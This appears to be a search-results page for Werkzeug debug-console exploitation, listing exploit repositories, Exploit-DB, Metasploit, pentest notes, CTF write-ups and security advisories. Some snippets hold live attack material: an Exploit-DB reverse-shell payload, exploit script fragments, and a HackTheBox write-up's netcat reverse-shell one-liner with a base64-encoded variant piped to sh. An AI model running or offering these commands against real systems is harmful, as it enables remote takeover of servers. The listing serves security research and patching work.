GitHub
github.com › topics › werkzeug-exploit
werkzeug-exploit · GitHub Topics · GitHub
WConsole Extractor is a python library which automatically exploits a Werkzeug development server in debug mode.
GitHub
github.com › its-arun › Werkzeug-Debug-RCE
GitHub - its-arun/Werkzeug-Debug-RCE: Python script for exploiting Werkzeug Debug RCE useful for CTF · GitHub
Python script for exploiting Werkzeug Debug RCE useful for CTFs where you just need to read a particular file or execute some command.
Starred by 39 users
Forked by 22 users
Languages Python
GitHub
github.com › MistSpark › Vigilant-Exploits › blob › master › Werkzeug_Exploit.py
Vigilant-Exploits/Werkzeug_Exploit.py at master · MistSpark/Vigilant-Exploits
basePort = sys.argv[2]
·
· #INITIAL CONNECTION WITH THE TARGET..
· print u"\n\u001b[32;1mConnecting To The Target...\u001b[0m\n"
· res = requests.get('http://%s:%s/console'% (baseUrl,basePort))
·
· #Checking for Werkzeug Console..
· if "Werkzeug powered traceback interpreter" not in res.text:
·
Author MistSpark
GitHub
github.com › wdahlenburg › werkzeug-debug-console-bypass
GitHub - wdahlenburg/werkzeug-debug-console-bypass: Werkzeug has a debug console that requires a pin. It's possible to bypass this with an LFI vulnerability or use it as a local privilege escalation vector. · GitHub
Werkzeug has a debug console that requires a pin. It's possible to bypass this with an LFI vulnerability or use it as a local privilege escalation vector. - wdahlenburg/werkzeug-debug-conso...
Starred by 64 users
Forked by 7 users
Languages Python 85.8% | Dockerfile 14.2%
GitHub
github.com › grav3m1nd-byte › werkzeug-pin
GitHub - grav3m1nd-byte/werkzeug-pin: Yet another Werkzeug Console Pin Exploit Explanation · GitHub
In this case, we are taking the exploit script a step further and we are relying on subprocess to reuse the HTTP request made through by using curl. Doing this, helps in dynamically getting the victim server information remotely and without relying on python's urllib to make these HTTP requests. Once you find out Werkzeug Console is pin-protected, you need to find a way to get this pin and access the debug console, right?
Author grav3m1nd-byte
HackTricks
book.hacktricks.xyz › home › network services pentesting › pentesting web › werkzeug
Werkzeug / Flask Debug - HackTricks
However, if the HTTP connection ... GitHub - Ruulian/wconsole_extractor: WConsole Extractor is a python library which automatically exploits a Werkzeug development server in debug mode....
GitHub
github.com › am0nsec › exploit › blob › master › python › werkzeug-debug-console › exploit.py
exploit/python/werkzeug-debug-console/exploit.py at master · am0nsec/exploit
sys.exit(1) · if 'Werkzeug powered traceback interpreter' not in resp.text: print(error_message('Werkzeug console not found!')) sys.exit(1) print(success_message('Werkzeug console successfully found!')) ·
Author am0nsec
GitHub
github.com › Fare9 › PyWerkzeug-Debug-Command-Execution
GitHub - Fare9/PyWerkzeug-Debug-Command-Execution: python exploit for werkzeug debug shell command execution · GitHub
People would say it's based on MSF exploit (https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/werkzeug_debug_rce.rb), but as I couldn't understand at all this exploit, I did it my own exploit.
Starred by 10 users
Forked by 8 users
Languages Python
GitHub
github.com › microsoft › cascadia-code › issues › 649
There is a vulnerability in Werkzeug 2.0.1,upgrade recommended · Issue #649 · microsoft/cascadia-code
August 31, 2022 - cascadia-code/requirements.txt Line 198 in 017bde5 werkzeug==2.0.1 CVE-2022-29361 Recommended upgrade version:2.1.1
Author QiAnXinCodeSafe
Exploit-DB
exploit-db.com › exploits › 43905
Werkzeug - 'Debug Shell' Command Execution - Multiple remote Exploit
January 28, 2018 - #!/usr/bin/env python import requests import sys import re import urllib # usage : python exploit.py 192.168.56.101 5000 192.168.56.102 4422 if len(sys.argv) != 5: print "USAGE: python %s <ip> <port> <your ip> <netcat port>" % (sys.argv[0]) sys.exit(-1) response = requests.get('http://%s:%s/console' % (sys.argv[1],sys.argv[2])) if "Werkzeug " not in response.text: print "[-] Debug is not enabled" sys.exit(-1) # since the application or debugger about python using python for reverse connect cmd = '''import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%s",%
GitHub
github.com › magma2 › exploit › blob › master › werkzeug.py
exploit/werkzeug.py at master · magma2/exploit
# usage : python exploit.py 192.168.56.101 5000 192.168.56.102 4422
·
· if len(sys.argv) != 5:
· print "USAGE: python %s <ip> <port> <your ip> <netcat port>" % (sys.argv[0])
· sys.exit(-1)
·
·
· response = requests.get('http://%s:%s/console' % (sys.argv[1],sys.argv[2]))
·
· if "Werkzeug " not in response.text:
·
Author magma2
Veracode
sourceclear.com › vulnerability-database › security › directory-traversal › python › sid-20917
Directory Traversal Vulnerability in the werkzeug library
We cannot provide a description for this page right now
Snyk
snyk.io › snyk vulnerability database › pip › werkzeug
Werkzeug 2.1.2 vulnerabilities | Snyk
Learn more about known Werkzeug 2.1.2 vulnerabilities and licenses detected.
GitHub
github.com › advisories › GHSA-2g68-c3qc-8985
Werkzeug debugger vulnerable to remote execution when interacting with attacker controlled domain · CVE-2024-34069 · GitHub Advisory Database · GitHub
May 5, 2024 - The debugger in affected versions of Werkzeug can allow an attacker to execute code on a developer's machine under some circumstances.
GitHub
github.com › wazuh › wazuh › issues › 20602
Upgrade Werkzeug version to 3.0.1 or a version <=2.3.8 · Issue #20602 · wazuh/wazuh
December 2, 2023 - During the Weekly vulnerability scan, It was found that the Werkzeug version currently used in the Python embedded version (2.2.3) contains a vulnerability that is fixed in version 3.0.1, version 2.3.8 and higher
Author EduLeon12
Exploit Notes
exploit-notes.hdks.org › exploit › web › framework › python › werkzeug-pentesting
Werkzeug Pentesting - Exploit Notes
January 18, 2024 - To use Exploit Notes locally, run the following command: git clone https://github.com/hdks-bug/exploitnotes.git cd exploitnotes python3 -m venv .venv source .venv/bin/activate pip3 install -r requirements.txt zensical serve
GitHub
github.com › rapid7 › metasploit-framework › blob › master › modules › exploits › multi › http › werkzeug_debug_rce.rb
metasploit-framework/modules/exploits/multi/http/werkzeug_debug_rce.rb at master · rapid7/metasploit-framework
include Msf::Exploit::Remote::... Execution', 'Description' => %q{ This module will exploit the Werkzeug debug console to put down a Python shell....
Author rapid7
Vulnlab
arz101.medium.com › hackthebox-opensource-84e644164a4c
HackTheBox — Opensource - ARZ101 - Medium
October 8, 2022 - rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.96 3333 >/tmp/fecho 'cm0gLWYgL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL3NoIC1pIDI+JjF8bmMgMTAuMTAuMTQuOTYgMzMzMyA+L3RtcC9mCg==' | base64 -d | sh · Press enter or click to view image in full size · We can get foothold by generating the console PIN using the exploit from here · https://github.com/wdahlenburg/werkzeug-debug-console-bypass ·
Snyk
security.snyk.io › snyk vulnerability database › pip
werkzeug vulnerabilities
Published: 18 years ago Last updated: 23 days ago Latest version: 3.1.8 Latest non-vulnerable version: 3.1.8 ... Loading chart... ... Further analysis of the maintenance status of Werkzeug based on released PyPI versions cadence, the repository activity, and other data points determined that its maintenance is Healthy. We found that Werkzeug demonstrates a positive version release cadence with at least one new version released in the past 3 months. As a healthy sign for on-going project maintenance, we found that the GitHub repository had at least 1 pull request or issue interacted with by the community.